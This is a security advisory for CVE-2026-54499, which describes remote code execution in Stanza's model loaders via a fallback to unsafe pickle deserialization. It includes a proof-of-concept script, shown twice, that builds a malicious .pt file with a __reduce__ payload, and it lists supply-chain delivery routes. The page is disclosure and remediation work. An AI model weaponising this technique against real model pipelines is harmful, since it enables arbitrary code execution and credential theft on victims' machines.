VYPR
High severity7.5NVD Advisory· Published Jun 19, 2026· Updated Jun 19, 2026

Stanza: Remote Code Execution via Unsafe Pickle Deserialization in Model Loaders

CVE-2026-54499

Description

Summary

Stanza 1.12.0 attempts to safely load PyTorch checkpoint files using torch.load(..., weights_only=True), but automatically falls back to the fully unsafe torch.load(..., weights_only=False) when the safe load raises pickle.UnpicklingError. Because the UnpicklingError condition is fully attacker-controllable, any .pt file that contains a single unsupported pickle global will trigger it.

An attacker who can place a malicious pretrain or model file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) can achieve arbitrary code execution on any machine that loads a Stanza NLP pipeline.

Code execution occurs inside the Stanza pretrain-loading API, not merely by calling torch.load directly.

Details

The vulnerable code is in pretrain.py#L59-L67 (Stanza 1.12.0):

try:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
except UnpicklingError:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=False)

When weights_only=True is passed, PyTorch's deserializer raises pickle.UnpicklingError for any object whose class or callable is not on the safe-globals allowlist. This is the intended safety mechanism. However, Stanza catches that exception and immediately reloads the same attacker-controlled file with weights_only=False, which invokes Python's full pickle deserializer and executes any __reduce__ method in the file without restriction.

The fallback is triggered reliably and intentionally: an attacker embeds one unsupported pickle global (e.g., builtins.open) anywhere in an otherwise structurally valid Stanza pretrain state dict. The safe load rejects it; the unsafe reload runs it.

The same try/except pattern exists in at least five additional loaders in Stanza 1.12.0:

| File | Lines | |------|-------| | stanza/models/common/pretrain.py | 64–66 | | stanza/models/coref/model.py | 251–253, 329–331 | | stanza/models/classifiers/trainer.py | 80–82 | | stanza/models/constituency/base_trainer.py | 94–96 |

Additionally, stanza/models/lemma_classifier/base_model.py:127 calls torch.load(filename, lambda storage, loc: storage) with no weights_only argument at all, which defaults to False on any PyTorch < 2.6.

The call chain from the public API to the vulnerable fallback is:

stanza.models.common.foundation_cache.load_pretrain(path)
  → FoundationCache.load_pretrain(path)
    → stanza.models.common.pretrain.Pretrain(filename)
      → Pretrain.emb  (property access triggers load)
        → Pretrain.load()
          → torch.load(..., weights_only=True)   # raises UnpicklingError
          → torch.load(..., weights_only=False)  # executes arbitrary pickle

---

PoC

Environment: Python 3.11, stanza==1.12.0, torch==2.12.0

Step 1: Install dependencies: ``bash pip install stanza==1.12.0 torch==2.12.0 ``

**Step 2: Save the following as exploit.py:**

import os
from pathlib import Path

import torch
import stanza
from stanza.models.common.foundation_cache import FoundationCache, load_pretrain
from stanza.models.common.vocab import VOCAB_PREFIX

SENTINEL = "/tmp/stanza_rce_proof"
MODEL    = "/tmp/stanza_malicious.pt"

class HarmlessPayload:
    """Demonstrates execution; writes a sentinel file."""
    def __init__(self, path):
        self.path = path
    def __reduce__(self):
        return (open, (self.path, "w"))

# Build a structurally valid Stanza pretrain state dict with the payload embedded.
words = VOCAB_PREFIX + ["hello"]
state = {
    "vocab": {
        "lang": "", "idx": 0, "cutoff": 0, "lower": False,
        "_id2unit": words,
        "_unit2id": {w: i for i, w in enumerate(words)},
    },
    "emb": torch.zeros((len(words), 2), dtype=torch.float32),
    "payload": HarmlessPayload(SENTINEL),   # ← the malicious object
}
torch.save(state, MODEL)

# Confirm safe-only load raises UnpicklingError and does NOT create sentinel.
try:
    torch.load(MODEL, lambda s, l: s, weights_only=True)
    print("UNEXPECTED: safe load succeeded (no fallback needed)")
except Exception as e:
    print(f"Control: safe load raised {type(e).__name__} : sentinel exists: {Path(SENTINEL).exists()}")

# Load through the real Stanza API. The fallback fires and the sentinel is created.
cache   = FoundationCache()
pretrain = load_pretrain(MODEL, foundation_cache=cache)

print(f"stanza={stanza.__version__}  torch={torch.__version__}")
print(f"emb_shape={tuple(pretrain.emb.shape)}")
print(f"sentinel_exists={Path(SENTINEL).exists()}")
print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN")

Step 3 : Run: ``bash python exploit.py ``

Expected output (confirmed): `` Control: safe load raised UnpicklingError : sentinel exists: False stanza=1.12.0 torch=2.12.0 emb_shape=(5, 2) sentinel_exists=True VERDICT: ACTUAL_VULN_REAL_STANZA_PATH ``

The sentinel is created exclusively by the Stanza pretrain-loading API invoking the unsafe fallback : not by a direct torch.load call in the PoC.

---

Impact

Vulnerability class: CWE-502 : Deserialization of Untrusted Data

Who is impacted: Any user, researcher, CI/CD pipeline, or production NLP service that loads a Stanza model pretrain file from a source that is not under the victim's exclusive cryptographic control. Concretely:

  • Developers who run stanza.Pipeline(lang) after downloading models from HuggingFace or GitHub
  • CI pipelines that automatically refresh Stanza models during builds
  • Research environments that share pretrain files over shared network storage or model repositories

Attack prerequisites: The attacker must be able to place a malicious .pt pretrain file at a path that Stanza will load. Realistic delivery vectors include: - Compromise of a HuggingFace model repository hosting Stanza pretrain weights - Poisoning of a shared model cache directory (NFS, S3, artifact store) - A malicious pretrain file distributed via a third-party fine-tuning hub or research repo

What an attacker achieves: Arbitrary code execution with the full privileges of the process running stanza.Pipeline(), typically a developer workstation, a Jupyter notebook server, or a GPU training node. This allows credential theft (HuggingFace tokens, cloud IAM keys from environment variables), persistent backdoors, data exfiltration, and lateral movement in multi-tenant training infrastructure.

Recommended fix:

Remove the unsafe fallback entirely. If weights_only=True raises UnpicklingError, fail closed:

try:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
except UnpicklingError as e:
    raise RuntimeError(
        f"Refusing to load legacy pretrain file {self.filename!r} with unsafe "
        "deserialization. Regenerate the file using a trusted Stanza migration tool."
    ) from e

If legacy NumPy-containing pretrain files must be supported, use PyTorch's add_safe_globals() API to allowlist the specific NumPy dtypes required, rather than disabling all safety checks. Apply the same fix to all six affected loaders listed above.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1

Patches

Vulnerability mechanics

Root cause

"Stanza catches `pickle.UnpicklingError` from `torch.load(..., weights_only=True)` and falls back to the fully unsafe `torch.load(..., weights_only=False)`, allowing an attacker-controlled pickle payload to execute arbitrary code."

Attack vector

An attacker who can place a malicious `.pt` pretrain file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) triggers arbitrary code execution. The file embeds a single unsupported pickle global (e.g., `builtins.open`) in an otherwise valid Stanza state dict. When Stanza's `Pretrain.load()` calls `torch.load(..., weights_only=True)`, PyTorch raises `pickle.UnpicklingError`; the catch block then reloads the same file with `weights_only=False`, executing any `__reduce__` method in the payload without restriction. [ref_id=1] [ref_id=2]

Affected code

The vulnerable code is in `stanza/models/common/pretrain.py` lines 59–67, where a `try/except UnpicklingError` block falls back to unsafe deserialization. The same pattern exists in `stanza/models/coref/model.py` (lines 251–253, 329–331), `stanza/models/classifiers/trainer.py` (lines 80–82), and `stanza/models/constituency/base_trainer.py` (lines 94–96). Additionally, `stanza/models/lemma_classifier/base_model.py:127` calls `torch.load` with no `weights_only` argument at all, defaulting to `False` on PyTorch < 2.6. [ref_id=1]

What the fix does

The patch must remove the unsafe fallback entirely. When `weights_only=True` raises `UnpicklingError`, the code should fail closed by raising a `RuntimeError` that refuses to load the file with unsafe deserialization. If legacy NumPy-containing pretrain files must be supported, PyTorch's `add_safe_globals()` API should be used to allowlist only the specific NumPy dtypes required, rather than disabling all safety checks. The same fix must be applied to all six affected loaders listed in the advisory. [ref_id=1]

Preconditions

  • inputThe attacker must be able to place a malicious .pt pretrain file at a path that Stanza will load (e.g., via compromised model repository, shared cache, or third-party hub).
  • configThe victim must invoke a Stanza API that triggers the vulnerable model loader, such as stanza.Pipeline(lang) or load_pretrain().

Reproduction

```python import os from pathlib import Path

import torch import stanza from stanza.models.common.foundation_cache import FoundationCache, load_pretrain from stanza.models.common.vocab import VOCAB_PREFIX

SENTINEL = "/tmp/stanza_rce_proof" MODEL = "/tmp/stanza_malicious.pt"

class HarmlessPayload: """Demonstrates execution; writes a sentinel file.""" def __init__(self, path): self.path = path def __reduce__(self): return (open, (self.path, "w"))

words = VOCAB_PREFIX + ["hello"] state = { "vocab": { "lang": "", "idx": 0, "cutoff": 0, "lower": False, "_id2unit": words, "_unit2id": {w: i for i, w in enumerate(words)}, }, "emb": torch.zeros((len(words), 2), dtype=torch.float32), "payload": HarmlessPayload(SENTINEL), } torch.save(state, MODEL)

try: torch.load(MODEL, lambda s, l: s, weights_only=True) print("UNEXPECTED: safe load succeeded (no fallback needed)") except Exception as e: print(f"Control: safe load raised {type(e).__name__} : sentinel exists: {Path(SENTINEL).exists()}")

cache = FoundationCache() pretrain = load_pretrain(MODEL, foundation_cache=cache)

print(f"stanza={stanza.__version__} torch={torch.__version__}") print(f"emb_shape={tuple(pretrain.emb.shape)}") print(f"sentinel_exists={Path(SENTINEL).exists()}") print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN") ```

Expected output: `sentinel_exists=True` and `VERDICT: ACTUAL_VULN_REAL_STANZA_PATH`. [ref_id=1]

Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.